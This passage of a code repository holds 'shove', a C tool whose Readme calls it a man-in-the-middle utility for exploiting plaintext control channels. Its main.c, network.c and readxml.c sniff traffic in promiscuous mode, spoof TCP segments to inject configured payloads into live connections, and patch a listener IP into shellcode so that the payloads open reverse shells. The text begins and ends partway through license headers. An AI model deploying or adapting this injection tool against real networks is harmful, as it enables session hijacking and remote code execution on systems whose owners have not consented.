PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | 35 | struct frequencytable { 36 | int channel; 37 | uint16_t frequency; 38 | int active; 39 | }; 40 | 41 | const struct frequencytable freqtab[] = { 42 | {1, 2412}, 43 | {2, 2417}, 44 | {3, 2422}, 45 | {4, 2427}, 46 | {5, 2432}, 47 | {6, 2437}, 48 | {7, 2442}, 49 | {8, 2447}, 50 | {9, 2452}, 51 | {10, 2457}, 52 | {11, 2462}, 53 | {12, 2467}, 54 | {13, 2472}, 55 | {14, 2484}, 56 | {36, 5180}, 57 | {40, 5200}, 58 | {42, 5210}, 59 | {44, 5220}, 60 | {48, 5240}, 61 | {50, 5250}, 62 | {52, 5260}, 63 | {56, 5280}, 64 | {58, 5290}, 65 | {60, 5300}, 66 | {64, 5320}, 67 | {149, 5745}, 68 | {152, 5760}, 69 | {153, 5765}, 70 | {157, 5785}, 71 | {160, 5800}, 72 | {161, 5805}, 73 | {165, 5825}, 74 | {0, 0} 75 | }; 76 | -------------------------------------------------------------------------------- /shove/Makefile: -------------------------------------------------------------------------------- 1 | CC = gcc 2 | CFLAGS = -O3 -I/usr/include/libxml2 3 | PROGNAME = shove 4 | 5 | default: all 6 | 7 | all: 8 | $(CC) $(CFLAGS) -c network.c 9 | $(CC) $(CFLAGS) -c -lxml2 readxml.c 10 | $(CC) $(CFLAGS) -c -lxml2 main.c 11 | $(CC) network.o readxml.o main.o -lxml2 -o $(PROGNAME) 12 | 13 | clean: 14 | rm network.o readxml.o main.o $(PROGNAME) 15 | 16 | -------------------------------------------------------------------------------- /shove/Readme.md: -------------------------------------------------------------------------------- 1 | Introduction: 2 | 3 | This tool functions as a MiTM utility for exploiting plaintext control 4 | channels. It sniffs for TCP segments with known values or "trigger". 5 | Once it observes these "triggers," it inserts other segments or "responses". 6 | 7 | Configuration: 8 | 9 | The primary configuraiton for this tool comes from an XML configuration file. 10 | It's format are as follows: 11 | 12 | <doc> 13 | 14 | This tag defines the beginning and ending of the configuration data. 15 | 16 | <console> 17 | 18 | This tag defines an IP address for a "listener." Many of the signatures 19 | are gonig to be "shellcode" or PIC assembly. The IP address defined 20 | in this tag is resolved as a 32 bit value, presumably by DNS. 21 | This 32 bit value is then written over whever the "magic" number 22 | 0xb7b7b7b7 exists within the binary "responses." 23 | So, for example, this line: 24 | 25 | 10.0.0.1 26 | 27 | would cause any instance of 0xb7b7b7b7 to be replaced with 0x0a000001. 28 | 29 | <sig> 30 | 31 | This tag defines a "signature" which includes a "trigger" and a 32 | "response." Once the "trigger" is observed within a TCP segment, 33 | the "response" is inserted into the data stream via packet spoofing. 34 | 35 | <response> 36 | 37 | This tag defines the data that will be inserted into the data stream 38 | after the "trigger" is detected. 39 | 40 | <rtype> 41 | 42 | This tag is currently unimplemented. In the future, users will be 43 | able to define responses with separate files instead of listing them 44 | within the configuration file. 45 | 46 | <name> 47 | 48 | This tag allows users to "name" their signatures. 49 | This data may be used in alerting. 50 | 51 | <direction> 52 | 53 | This value will be either "forward" or "reverse". Forward signatures 54 | will cause the response data to be appended to the data sent in the 55 | "trigger". Reverse signatures will send their data as if they were 56 | reponses to the data sent in the "trigger." 57 | 58 | 59 | Format: 60 | 61 | Much of the data in the configuration file will not be easily defined 62 | in text. "Binary" or "signed" input (or any bytes greater than 0x7f) 63 | can therefore be difficult to represent. The file format allows users 64 | to define values using "HTMLesque" escaping. 65 | 66 | 67 | For example, the string "%41%43CD" will be understood as "ABCD", and 68 | the highest value single byte can be represented as "%ff". 69 | 70 | 71 | -------------------------------------------------------------------------------- /shove/main.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | #include 43 | #include 44 | #include 45 | #include 46 | #include 47 | #include 48 | #include 49 | #include 50 | #include 51 | #include 52 | #include 53 | #include "readxml.h" 54 | #include "network.h" 55 | 56 | // Function Prototypes 57 | int getrawsock(char *intname); 58 | int sendtcpdata(u_int32_t s_ip, u_int32_t d_ip, u_int16_t sport, 59 | u_int16_t dport, unsigned char *buf, u_int16_t buflen, 60 | int seqoffset, int acknumber, uint16_t id, int direction); 61 | struct sigentry *readsigfile(char *filename, uint32_t ip); 62 | 63 | 64 | // Basic documentation 65 | int usage(char *progname) { 66 | printf("Usage:\n"); 67 | printf("%s\n", progname); 68 | printf("\t-h\tDisplays this message\n"); 69 | printf("\t-l\t\n"); 70 | printf("\t-c\t\n"); 71 | printf("\t-i\t\n"); 72 | 73 | return (0); 74 | } 75 | 76 | int destroysyslog(char *msg, int verbose) { 77 | if(verbose) { 78 | printf("Detected %s", msg); 79 | } 80 | openlog("shove", LOG_CONS | LOG_NDELAY, LOG_AUTH); 81 | syslog(LOG_WARNING, "detected \"%s\"", msg); 82 | closelog(); 83 | } 84 | 85 | 86 | int main(int argc, char *argv[]) { 87 | int sock; 88 | int pktlen; 89 | int payloadoffset; 90 | int c; 91 | int verbose = 0; 92 | uint8_t *pkt; 93 | uint8_t *tcppayload; 94 | uint32_t seqtmp; 95 | uint32_t acktmp; 96 | uint32_t listenerip = 0x00000000; 97 | struct iphdr *ip; 98 | struct tcphdr *tcp; 99 | char *interface = "eth0"; 100 | char *xmlfilename; 101 | struct sigentry *sigtab; 102 | struct sigentry *thissig; 103 | struct sock_fprog fprog; 104 | struct sock_filter fil[] = { // LPF filter for TCP packets 105 | {0x28, 0, 0, 0x0000000c}, 106 | {0x15, 0, 5, 0x000086dd}, 107 | {0x30, 0, 0, 0x00000014}, 108 | {0x15, 6, 0, 0x00000006}, 109 | {0x15, 0, 6, 0x0000002c}, 110 | {0x30, 0, 0, 0x00000036}, 111 | {0x15, 3, 4, 0x00000006}, 112 | {0x15, 0, 3, 0x00000800}, 113 | {0x30, 0, 0, 0x00000017}, 114 | {0x15, 0, 1, 0x00000006}, 115 | {0x6, 0, 0, 0x0000ffff}, 116 | {0x6, 0, 0, 0x00000000}, 117 | }; 118 | 119 | 120 | while ((c = getopt(argc, argv, "hi:c:l:v")) != -1) { 121 | switch (c) { 122 | case 'h': // probably help 123 | usage(argv[0]); 124 | return (0); 125 | break; 126 | case 'i': // interface to monitor 127 | interface = optarg; 128 | break; 129 | case 'c': // config file 130 | xmlfilename = optarg; 131 | break; 132 | case 'l': // IP address of the listener 133 | listenerip = resolveipv4(optarg); 134 | break; 135 | case 'v': 136 | verbose++; 137 | break; 138 | default: 139 | break; 140 | } 141 | } 142 | 143 | 144 | // read the XML config file 145 | sigtab = readsigfile(xmlfilename, listenerip); 146 | 147 | // open up a raw socket for sniffing 148 | sock = getrawsock(interface); 149 | // apply the LPF/BPF filter 150 | fprog.len = sizeof(fil) / sizeof(fil[0]); 151 | fprog.filter = fil; 152 | setsockopt(sock, SOL_SOCKET, SO_ATTACH_FILTER, &fprog, sizeof(fprog)); 153 | 154 | // this is where we read packets into 155 | pkt = (uint8_t *) malloc(MAXPACKET); 156 | if (pkt == NULL) { 157 | perror("can't allocate memory"); 158 | exit(1); 159 | } 160 | ip = (struct iphdr *) (pkt + (sizeof(struct ether_header))); 161 | tcp = 162 | (struct tcphdr *) (pkt + (sizeof(struct ether_header)) + 163 | (sizeof(struct iphdr))); 164 | 165 | // this for loop is our sniff loop 166 | for (pktlen = 0; pktlen >= 0; pktlen = read(sock, pkt, MAXPACKET)) { 167 | if (pktlen > 0) { 168 | // find where the TCP payloads are 169 | payloadoffset = 170 | ((sizeof(struct iphdr)) + (sizeof(struct ether_header)) + 171 | (tcp->th_off * 4)); 172 | tcppayload = (uint8_t *) (pkt + payloadoffset); 173 | // go through the signatures in the list one by one 174 | for (thissig = sigtab; thissig != NULL; 175 | thissig = thissig->next) { 176 | if (memcmp(tcppayload, thissig->netsig, thissig->netsiglen) 177 | == 0) { 178 | destroysyslog(thissig->name, verbose); 179 | if (thissig->direction == SIGREVERSE) { 180 | //spoof the response 181 | seqtmp = 182 | htonl(ntohl(tcp->seq) + thissig->netsiglen); 183 | sendtcpdata(ip->daddr, ip->saddr, tcp->dest, 184 | tcp->source, thissig->response, 185 | thissig->responselen, tcp->ack_seq, 186 | seqtmp, ip->id, SIGREVERSE); 187 | } else { 188 | 189 | // append to a message 190 | seqtmp = htonl(ntohl(tcp->ack_seq)); 191 | acktmp = 192 | htonl(ntohl(tcp->seq) + thissig->netsiglen); 193 | 194 | sendtcpdata(ip->saddr, ip->daddr, tcp->source, 195 | tcp->dest, thissig->response, 196 | thissig->responselen, acktmp, seqtmp, 197 | ip->id, SIGFORWARD); 198 | } 199 | 200 | } 201 | } 202 | 203 | } 204 | } 205 | 206 | return (0); 207 | } 208 | -------------------------------------------------------------------------------- /shove/network.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | #include 43 | #include 44 | #include 45 | #include 46 | #include 47 | #include 48 | #include 49 | #include 50 | #include 51 | #include 52 | #include "network.h" 53 | 54 | 55 | // resolve hostnames for DNS 56 | uint32_t resolveipv4(char *host) { 57 | uint32_t ip = 0x00000000; 58 | struct hostent *hp; 59 | 60 | ip = inet_addr(host); 61 | if (ip == INADDR_NONE) { 62 | #ifndef STATIC // gethostbyname() doesn't like static compilation 63 | hp = gethostbyname(host); 64 | if (hp != NULL) { 65 | memcpy(&ip, hp->h_addr, 4); 66 | } 67 | #endif 68 | } 69 | return (ip); 70 | } 71 | 72 | 73 | // return a raw socket in PROMISC mode 74 | int getrawsock(char *intname) { 75 | int sock; 76 | struct ifreq ifr; 77 | if ((sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) { 78 | perror("can't open raw socket"); 79 | exit(1); 80 | } 81 | memset(&ifr, 0x00, sizeof(struct ifreq)); 82 | strncpy(ifr.ifr_name, intname, IFNAMSIZ); 83 | if (ioctl(sock, SIOCGIFFLAGS, &ifr) < 0) { 84 | perror("can't get socket info"); 85 | exit(1); 86 | } 87 | ifr.ifr_flags |= IFF_PROMISC; 88 | if (ioctl(sock, SIOCSIFFLAGS, &ifr) < 0) { 89 | perror("can't set promic"); 90 | exit(1); 91 | } 92 | return (sock); 93 | } 94 | 95 | // checksums for makeing packets 96 | u_int16_t in_cksum(u_int16_t * addr, int len) { 97 | register int nleft = len; 98 | register u_int16_t *w = addr; 99 | register int sum = 0; 100 | u_short answer = 0; 101 | 102 | while (nleft > 1) { 103 | sum += *w++; 104 | nleft -= 2; 105 | } 106 | 107 | if (nleft == 1) { 108 | *(u_char *) (&answer) = *(u_char *) w; 109 | sum += answer; 110 | } 111 | sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ 112 | sum += (sum >> 16); /* add carry */ 113 | answer = ~sum; /* truncate to 16 bits */ 114 | return (answer); 115 | } 116 | 117 | // send an individual TCP packet 118 | int sendtcp(u_int32_t s_ip, u_int32_t d_ip, u_int16_t sport, 119 | u_int16_t dport, unsigned char *buf, u_int16_t buflen, 120 | int seqoffset, int acknumber, uint16_t id) { 121 | struct iphdr *ip; 122 | struct tcphdr *tcp; 123 | struct sockaddr_in sin; 124 | struct pseudohdr *pseudo; 125 | unsigned char *pkt; 126 | int one = 1; 127 | int pktlen; 128 | int sock; 129 | 130 | pktlen = sizeof(struct iphdr) + sizeof(struct tcphdr) + buflen; 131 | 132 | pkt = (unsigned char *) malloc(pktlen); 133 | if (pkt == NULL) { 134 | perror("can't allocate memory"); 135 | exit(1); 136 | } 137 | memset(pkt, 0x00, pktlen); 138 | memcpy(pkt + sizeof(struct iphdr) + sizeof(struct tcphdr), buf, 139 | buflen); 140 | 141 | ip = (struct iphdr *) pkt; 142 | tcp = (struct tcphdr *) (pkt + sizeof(struct iphdr)); 143 | pseudo = 144 | (struct pseudohdr *) (pkt + (sizeof(struct iphdr) - 145 | sizeof(struct pseudohdr))); 146 | 147 | pseudo->saddr = s_ip; 148 | pseudo->daddr = d_ip; 149 | pseudo->protocol = 6; 150 | pseudo->len = htons(sizeof(struct tcphdr) + buflen); 151 | 152 | tcp = (struct tcphdr *) (pkt + sizeof(struct iphdr)); 153 | tcp->source = sport; 154 | tcp->dest = dport; 155 | tcp->seq = seqoffset; 156 | tcp->ack_seq = acknumber; 157 | tcp->psh = 1; 158 | tcp->ack = 1; 159 | tcp->window = htons(400); 160 | tcp->urg_ptr = 0; 161 | tcp->doff = 5; 162 | tcp->check = in_cksum((u_int16_t *) pseudo, (sizeof(struct tcphdr) + 163 | sizeof(struct pseudohdr) + 164 | buflen)); 165 | 166 | ip->saddr = s_ip; 167 | ip->daddr = d_ip; 168 | ip->version = 4; 169 | ip->ihl = 5; 170 | ip->ttl = 123; 171 | ip->tot_len = 172 | htons(sizeof(struct iphdr) + sizeof(struct tcphdr) + buflen); 173 | ip->id = id; 174 | ip->protocol = 0x06; 175 | ip->check = 0; 176 | ip->check = in_cksum((u_int16_t *) pkt, sizeof(struct iphdr)); 177 | 178 | sin.sin_family = AF_INET; 179 | sin.sin_port = htons(dport); 180 | sin.sin_addr.s_addr = d_ip; 181 | 182 | sock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); 183 | if (sock < 0) { 184 | perror("can't open socket"); 185 | exit(1); 186 | } 187 | 188 | if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) < 0) { 189 | perror("setting socket options"); 190 | exit(1); 191 | } 192 | if (sendto 193 | (sock, pkt, pktlen, 0, (struct sockaddr *) &sin, 194 | sizeof(struct sockaddr)) < 0) { 195 | perror("sending packet"); 196 | exit(1); 197 | } 198 | free(pkt); 199 | close(sock); 200 | return (0); 201 | } 202 | 203 | // rap the sendtcp() function to send larger bufffers 204 | int sendtcpdata(u_int32_t s_ip, u_int32_t d_ip, u_int16_t sport, 205 | u_int16_t dport, unsigned char *buf, u_int16_t buflen, 206 | int seqoffset, int acknumber, uint16_t id, int direction) { 207 | uint32_t i; 208 | // RFC879 says we can send up to 536 bytes in each packet. 209 | // 512 is easier to debug 210 | int segsize = 512; 211 | 212 | for (i = 0; i < buflen; i = i + segsize) { 213 | if ((i + segsize) > buflen) { 214 | segsize = (buflen - i); 215 | } 216 | sendtcp(s_ip, d_ip, sport, dport, (buf + i), segsize, 217 | (seqoffset + htonl(i)), acknumber, id); 218 | } 219 | return (0); 220 | } 221 | -------------------------------------------------------------------------------- /shove/network.h: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #define MAXPACKET 2048 34 | 35 | struct pseudohdr { 36 | uint32_t saddr; 37 | uint32_t daddr; 38 | uint8_t unused; 39 | uint8_t protocol; 40 | uint16_t len; 41 | }; 42 | -------------------------------------------------------------------------------- /shove/readxml.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include "readxml.h" 39 | 40 | // function prototype(s) 41 | uint32_t resolveipv4(char *host); 42 | 43 | // convvert a string to reslove "escaped" characters 44 | // instr == user supplied string with escaped characters, like "%0a" 45 | // outstr == where "unescaped" data goes 46 | // the return value is the length of "outstr" 47 | // PLEASE watch buffer length for outstr 48 | int decodestr(char *instr, uint8_t * outstr) { 49 | int i; 50 | int pos = 0; 51 | char hexbuf[3]; 52 | char *endptr; 53 | long int intbuf; 54 | uint8_t *bytebuf; 55 | 56 | bytebuf = (uint8_t *) & intbuf; 57 | 58 | for (i = 0; i < strlen(instr); i++) { 59 | if (instr[i] == '%') { 60 | hexbuf[0] = instr[i + 1]; 61 | hexbuf[1] = instr[i + 2]; 62 | hexbuf[2] = 0x00; 63 | intbuf = strtol(&hexbuf[0], &endptr, 16); 64 | outstr[pos++] = bytebuf[0]; 65 | 66 | i = i + 2; 67 | } else { 68 | outstr[pos++] = instr[i]; 69 | } 70 | 71 | } 72 | 73 | return (pos); 74 | } 75 | 76 | // search and replace raw binary data 77 | // inbuf is going to get changed 78 | // every instance of "old" will be repalced with "new" 79 | // "old" and "new" are of inbuflen bytes 80 | int replacebuf(uint8_t * inbuf, uint8_t * old, uint8_t * new, int inbuflen, 81 | int newlen) { 82 | int i; 83 | 84 | for (i = 0; i < (inbuflen - newlen); i++) { 85 | if (memcmp(inbuf + i, old, newlen) == 0) { 86 | memcpy(inbuf + i, new, newlen); 87 | } 88 | } 89 | return (0); 90 | } 91 | 92 | // return a linked list with signatures and responses 93 | // ip is the IP of the listner 94 | struct sigentry *readsigfile(char *filename, uint32_t ip) { 95 | int ret; 96 | int sig = -1; 97 | const xmlChar *name, *value; 98 | uint8_t *signature = NULL; 99 | uint8_t *rtype = NULL; 100 | uint8_t *response = NULL; 101 | uint8_t *signame = NULL; 102 | int direction = 0; 103 | int signaturelen = 0; 104 | int responselen = 0; 105 | char *cmd = NULL; 106 | char *resolvehost; 107 | int havesignature = 0; 108 | int haveresponse = 0; 109 | int havertype = 0; 110 | int havename = 0; 111 | int havedirection = 0; 112 | struct sigentry *se = NULL; 113 | struct sigentry *senext = NULL; 114 | struct sigentry *sereturn = NULL; 115 | 116 | xmlTextReaderPtr reader; 117 | 118 | reader = xmlReaderForFile(filename, NULL, 0); 119 | ret = xmlTextReaderRead(reader); 120 | 121 | cmd = (char *) malloc(MAXTAGLEN); 122 | if (cmd == NULL) { 123 | perror("can't allocate memory"); 124 | exit(1); 125 | } 126 | while (ret == 1) { 127 | name = xmlTextReaderConstName(reader); 128 | value = xmlTextReaderConstValue(reader); 129 | 130 | if ((name != NULL) && (strcmp((char *) name, "#text") != 0)) { 131 | memset(cmd, 0x00, MAXTAGLEN); 132 | memcpy(cmd, name, ISLESSER(strlen((char *) name), MAXTAGLEN)); 133 | } 134 | // defines the "listner" IP for revers shells 135 | if (!strncmp("console", cmd, 7)) { 136 | if (value != NULL) { 137 | if (value != NULL) { 138 | // get rid of whitespaces: space, cr, nl, and tab 139 | resolvehost = strtok((char *) value, "\x20\x0a\x0d\x09"); 140 | if (resolvehost != NULL) { 141 | ip = resolveipv4(resolvehost); 142 | } 143 | } 144 | } 145 | } 146 | // says we are definingig a trigger/response 147 | if (!strcmp(cmd, "sig")) { 148 | sig = sig * -1; 149 | if (sig < 0) { 150 | // when we get a , start processing 151 | // we no longer have these fields figured out for the next sig 152 | havesignature = 0; 153 | haveresponse = 0; 154 | havertype = 0; 155 | havename = 0; 156 | havedirection = 0; 157 | // alllocate the next entry in the list 158 | senext = 159 | (struct sigentry *) malloc(sizeof(struct sigentry)); 160 | if (senext == NULL) { 161 | perror("can't allocate memory"); 162 | exit(1); 163 | } 164 | 165 | senext->netsig = signature; 166 | senext->netsiglen = signaturelen; 167 | senext->response = response; 168 | senext->responselen = responselen; 169 | senext->name = (char *) signame; 170 | senext->direction = direction; 171 | senext->next = NULL; 172 | if (se == NULL) { 173 | se = senext; // this is the first in the sequence 174 | sereturn = se; 175 | } else { 176 | se->next = senext; // 177 | se = senext; 178 | } 179 | } 180 | memset(cmd, 0x00, MAXTAGLEN); 181 | } 182 | if ((value != NULL) && (sig > 0)) { 183 | // is the pattern we are looking for 184 | if (!strncmp("trigger", cmd, 7)) { 185 | if ((value != NULL) && (havesignature != 1)) { 186 | signature = (uint8_t *) malloc(strlen((char *) value)); 187 | if (signature == NULL) { 188 | perror("can't allocate memory"); 189 | exit(1); 190 | } 191 | // unescape the string we are looking for and figure out length 192 | signaturelen = decodestr((char *) value, signature); 193 | havesignature++; 194 | } 195 | // currently not implemented, but responses can be files in the future 196 | } else if (!strncmp("rtype", cmd, 5)) { 197 | if ((value != NULL) && (havertype != 1)) { 198 | rtype = (uint8_t *) malloc(strlen((char *) value)); 199 | if (rtype == NULL) { 200 | perror("can't allocate memory"); 201 | exit(1); 202 | } 203 | decodestr((char *) value, rtype); 204 | havertype++; 205 | } 206 | // what do we dump into the TCP stream 207 | } else if (!strncmp("response", cmd, 8)) { 208 | if ((value != NULL) && (haveresponse != 1)) { 209 | response = (uint8_t *) malloc(strlen((char *) value)); 210 | if (response == NULL) { 211 | perror("can't allocate memory"); 212 | exit(1); 213 | } 214 | // how much data do we shove into the stream? 215 | // also, "unescape" the data 216 | responselen = decodestr((char *) value, response); 217 | // if we defined a console IP, replace the "magic" number 218 | if (ip != 0x00000000) { 219 | replacebuf(response, (uint8_t *) DEFAULTIP, 220 | (uint8_t *) & ip, responselen, 4); 221 | } 222 | haveresponse++; 223 | } 224 | // defines the "name" for the signature 225 | } else if (!strncmp("name", cmd, 4)) { 226 | if ((value != NULL) && (havename != 1)) { 227 | signame = (uint8_t *) malloc(strlen((char *) value)); 228 | if (signame == NULL) { 229 | perror("can't allocate memory"); 230 | exit(1); 231 | } 232 | // you can put escaped characters in names 233 | decodestr((char *) value, signame); 234 | havename++; 235 | } 236 | // forward means we append ; reverse means we respond 237 | } else if (!strncmp("direction", cmd, 9)) { 238 | if ((value != NULL) && (havedirection != 1)) { 239 | if (!strncmp((char *) value, "forward", 7)) { 240 | direction = SIGFORWARD; 241 | } else { 242 | direction = SIGREVERSE; 243 | } 244 | havedirection++; 245 | } 246 | } 247 | } 248 | ret = xmlTextReaderRead(reader); 249 | 250 | } 251 | 252 | xmlTextReaderRead(reader); 253 | 254 | return (sereturn); 255 | } 256 | -------------------------------------------------------------------------------- /shove/readxml.h: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, 